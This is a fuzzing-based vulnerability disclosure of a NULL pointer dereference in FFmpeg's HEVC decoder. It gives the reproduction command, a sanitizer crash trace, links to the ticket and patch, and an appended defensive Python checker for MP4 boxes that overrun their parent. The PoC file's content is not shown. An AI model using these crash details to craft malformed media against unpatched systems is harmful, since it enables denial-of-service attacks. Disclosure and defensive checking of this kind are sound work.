|=----------------------------------------------------------------------------=|
|=-----------------------=[ Vulnerability Disclosure ]=-----------------------=|
|=--------------=[ FFmpeg/libavcodec: NULL Pointer Dereference ]=-------------=|
|=----------------------------------------------------------------------------=|
|=-----------------------=[ Tue 09 Feb 2021 22:30:30 ]=-----------------------=|
|=----------=[ https://qiuhao.org/VD_FFmpeg_libavcodec_CWE-476.txt ]=---------=|
|=----------------------------------------------------------------------------=|

During fuzzing, we found a null pointer dereference (CWE-476) in the latest
FFmpeg/libavcodec.

-- [ Test Version

ubuntu@VM:~/ffmpeg_sources/ffmpeg$ git log | head -n 4
commit 483cf7a1834edeb96cd8907521d2aa3530368081
Author: Paul B Mahol
Date:   Tue Feb 9 14:17:41 2021 +0100

-- [ Reproduce & ASAN Report

ubuntu@VM:~$ ./bin/ffmpeg -i PoC ouput.mp4
ffmpeg version N-101018-g483cf7a183 Copyright (c) 2000-2021 the FFmpeg developers
  built with clang version 10.0.0-4ubuntu1
  configuration: --prefix=/home/ubuntu/ffmpeg_build --pkg-config-flags=--static --extra-cflags='-I/home/ubuntu/ffmpeg_build/include -ggdb -fsanitize=address -fsanitize=undefined' --extra-ldflags='-L/home/ubuntu/ffmpeg_build/lib -fsanitize=address -fsanitize=undefined' --extra-libs='-lpthread -lm' --bindir=/home/ubuntu/bin --cc=clang --cxx=clang++ --disable-ffplay --disable-ffprobe --disable-stripping --assert-level=2 --enable-gpl --enable-gnutls --enable-libaom --enable-libass --enable-libfdk-aac --enable-libfreetype --enable-libmp3lame --enable-libopus --enable-libvorbis --enable-libvpx --enable-libx264 --enable-libx265 --enable-nonfree
  libavutil      56. 64.100 / 56. 64.100
  libavcodec     58.121.100 / 58.121.100
  libavformat    58. 67.100 / 58. 67.100
  libavdevice    58. 11.103 / 58. 11.103
  libavfilter     7.103.100 /  7.103.100
  libswscale      5.  8.100 /  5.  8.100
  libswresample   3.  8.100 /  3.  8.100
  libpostproc    55.  8.100 / 55.  8.100
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x61b000000080] overread end of atom 'stsd' by 808464282 bytes
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x61b000000080] stream 0, timescale not set
[hevc @ 0x619000000f80] Invalid NAL unit size in extradata.
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x61b000000080] Failed to open codec in avformat_find_stream_info
[hevc @ 0x619000000f80] Invalid NAL unit size in extradata.
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x61b000000080] Failed to open codec in avformat_find_stream_info
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x61b000000080] Could not find codec parameters for stream 0 (Video: hevc (Hvc1 / 0x31637648), none, 12336x12336): unspecified pixel format
Consider increasing the value for the 'analyzeduration' (0) and 'probesize' (5000000) options
Input #0, mov,mp4,m4a,3gp,3g2,mj2, from './PoC':
  Duration: N/A, bitrate: N/A
  Stream #0:0: Video: hevc (Hvc1 / 0x31637648), none, 12336x12336, 1 tbr, 1 tbn, 1 tbc
    Metadata:
      handler_name    : 0000000000000
      vendor_id       : 0000
      encoder         : 0000000000000000000000000000000
[hevc @ 0x619000002d80] Invalid NAL unit size in extradata.
libavcodec/hevcdec.c:3427:22: runtime error: applying zero offset to null pointer
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior libavcodec/hevcdec.c:3427:22 in
libavcodec/hevcdec.c:3427:22: runtime error: load of null pointer of type 'HEVCLocalContext *' (aka 'struct HEVCLocalContext *')
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior libavcodec/hevcdec.c:3427:22 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==29283==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000035bf0cd bp 0x0c4c00001224 sp 0x7fffbb338e40 T0)
==29283==The signal is caused by a READ memory access.
==29283==Hint: address points to the zero page.
    #0 0x35bf0cd in hevc_decode_free /home/ubuntu/ffmpeg_sources/ffmpeg/libavcodec/hevcdec.c:3427:19
    #1 0x4687b6e in ff_frame_thread_free /home/ubuntu/ffmpeg_sources/ffmpeg/libavcodec/pthread_frame.c:712:13
    #2 0x468c4d6 in ff_frame_thread_init /home/ubuntu/ffmpeg_sources/ffmpeg/libavcodec/pthread_frame.c:885:5
    #3 0x4e0ee38 in avcodec_open2 /home/ubuntu/ffmpeg_sources/ffmpeg/libavcodec/utils.c:759:15
    #4 0x57c0c4 in init_input_stream /home/ubuntu/ffmpeg_sources/ffmpeg/fftools/ffmpeg.c:2988:20
    #5 0x57c0c4 in transcode_init /home/ubuntu/ffmpeg_sources/ffmpeg/fftools/ffmpeg.c:3751:20
    #6 0x56f0d7 in transcode /home/ubuntu/ffmpeg_sources/ffmpeg/fftools/ffmpeg.c:4752:11
    #7 0x56c7b2 in main /home/ubuntu/ffmpeg_sources/ffmpeg/fftools/ffmpeg.c:4986:9
    #8 0x7f47a17ad0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #9 0x4251ad in _start (/home/ubuntu/bin/ffmpeg+0x4251ad)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/ffmpeg_sources/ffmpeg/libavcodec/hevcdec.c:3427:19 in hevc_decode_free
==29283==ABORTING

-- [ PoC

ubuntu@VM:~$ base64 PoC

Update, Thu, 11 Feb 2021 16:22:16 -0000:

Report Confirmed - https://trac.ffmpeg.org/ticket/9099
Patch Committed - https://github.com/FFmpeg/FFmpeg/commit/089706e009240ce3dc76f09ae9eee0ba98e65bd1
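As an added example that is not part of this disclosure or of FFmpeg's code, the Python below walks an MP4/ISOBMFF box tree and reports every box whose declared size runs past its enclosing box, which is the condition behind the "overread end of atom 'stsd'" warning in the log above and a cheap pre-decode check for a media intake pipeline. The sample bytes, the box nesting (moov/trak/mdia/minf/stbl/stsd) and the treatment of stsd as a FullBox with an 8-byte prefix are assumed from the ISOBMFF layout rather than taken from the page.

```python
import struct

# Added example, not FFmpeg code: flag boxes that overrun their parent box.
CONTAINERS = {"moov", "trak", "mdia", "minf", "stbl"}
FULLBOX_PREFIX = {"stsd": 8}  # version/flags (4) + entry_count (4) precede the entries

def walk_boxes(data, start=0, end=None, path=()):
    """Yield (path, declared_size, problem) for each box in data[start:end].

    problem is 0 for a sane box, the number of bytes it overruns its parent by,
    or -1 when the size field is too small to hold even the box header.
    """
    end = len(data) if end is None else end
    pos = start
    while pos + 8 <= end:
        size, = struct.unpack(">I", data[pos:pos + 4])
        box_type = data[pos + 4:pos + 8].decode("latin-1")
        header, here = 8, path + (box_type,)
        if size == 1 and pos + 16 <= end:          # 64-bit largesize follows the type
            size, = struct.unpack(">Q", data[pos + 8:pos + 16])
            header = 16
        elif size == 0:                            # box extends to the end of its parent
            size = end - pos
        if size < header:
            yield here, size, -1                   # malformed; stop, offsets are lost
            return
        overread = max(0, pos + size - end)
        yield here, size, overread
        if overread:
            return                                 # nothing after this can be trusted
        if box_type in CONTAINERS or box_type in FULLBOX_PREFIX:
            skip = header + FULLBOX_PREFIX.get(box_type, 0)
            yield from walk_boxes(data, pos + skip, pos + size, here)
        pos += size

def find_overreads(data):
    """Return [(path, declared_size, problem)] for every box that is not sane."""
    return [("/".join(p), s, o) for p, s, o in walk_boxes(data) if o]

def box(box_type, payload):
    """Build a box with a correct 32-bit size; used only to construct samples."""
    return struct.pack(">I", 8 + len(payload)) + box_type.encode() + payload

def sample(entry):
    """Constructed moov tree whose stsd holds a single sample-description entry."""
    stsd = box("stsd", b"\x00" * 4 + b"\x00\x00\x00\x01" + entry)
    return box("moov", box("trak", box("mdia", box("minf", box("stbl", stsd)))))

# Constructed inputs: a well-formed entry, and one whose size field is the ASCII
# filler "0000" (0x30303030 = 808464432), the magnitude of the overread FFmpeg logged.
GOOD = sample(box("hvc1", b"\x00" * 8))
BAD = sample(b"0000" + b"hvc1" + b"\x00" * 8)
```

For the constructed BAD tree, find_overreads reports the entry under moov/trak/mdia/minf/stbl/stsd with a declared size of 0x30303030, overrunning its parent by 808464416 bytes, while GOOD yields nothing.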